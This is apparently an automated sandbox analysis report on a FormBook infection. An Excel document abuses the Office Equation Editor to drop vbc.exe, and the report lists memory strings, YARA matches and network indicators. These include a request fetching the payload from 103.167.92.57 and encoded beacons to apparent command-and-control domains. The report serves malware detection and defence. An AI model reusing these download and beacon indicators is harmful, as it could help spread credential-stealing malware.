          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: vbc.exe, 00000004.00000002.478639061.00000000024C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blog.iandreev.com
          Source: vbc.exe, 00000004.00000002.478639061.00000000024C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blog.iandreev.com/
          Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000006.00000000.491850597.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.491850597.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.555506199.0000000001BE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.499381564.0000000003E50000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.491850597.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.491850597.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.555506199.0000000001BE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.491850597.0000000002CC7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.501167132.000000000447A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.560110260.00000000083F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.484447982.000000000447A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.501167132.000000000447A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.560110260.00000000083F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.484447982.000000000447A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E50395A7.emfJump to behavior
          Source: unknownDNS traffic detected: queries for: www.hevenorfeed.com
          Source: global trafficHTTP traffic detected: GET /CRC/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.167.92.57Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=H+0J8LIoM8xANCuc1KZRmbjixQokhoGpIPkQBETMRHrzrLtxV7SOMJUbaHNEQWxSCcCQ4A== HTTP/1.1Host: www.hevenorfeed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /yrcy/?aN=e/RF5Wkvcu2kD6Q92hYVOLL0JiY85m+wPQ7mJBVhAbkMJKQBASQfBcFHsaVDtw323W8DmA==&jdfhnl=EvxTDFUPJ2-xUnMP HTTP/1.1Host: www.dairatwsl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=v3r6hW97z/ZOf9TDdHCkxkGayxrL9igaQBwyCSAaMVPNp+0Lw1V9xr9SflbU5XGqGaZNIw== HTTP/1.1Host: www.laqueenbeautybar.suppliesConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2564dd8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2505e58.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
          Source: Screenshot number: 4Screenshot OCR: document is protected 16 17 ~ 18 19 20 21 22 Open the document in If thts document was 23 Mi
          Source: Screenshot number: 4Screenshot OCR: protected documents the yellow bar above )1 " F' 0 32 0 0 33 34 35 0 0 36
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.2564dd8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.2505e58.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\vbc.exeCode function: 4_2_005009704_2_00500970
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00509BD04_2_00509BD0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00500BC04_2_00500BC0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00509BC04_2_00509BC0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00500BB14_2_00500BB1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C0E15_2_0041C0E1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C9855_2_0041C985
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BA8F5_2_0041BA8F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C37B5_2_0041C37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CBED5_2_0041CBED
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C45D5_2_0041C45D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C8B5_2_00408C8B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C905_2_00408C90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D885_2_00402D88
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C75C5_2_0041C75C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007C905A5_2_007C905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007B30405_2_007B3040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007DD0055_2_007DD005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007AE0C65_2_007AE0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007AE2E95_2_007AE2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008512385_2_00851238
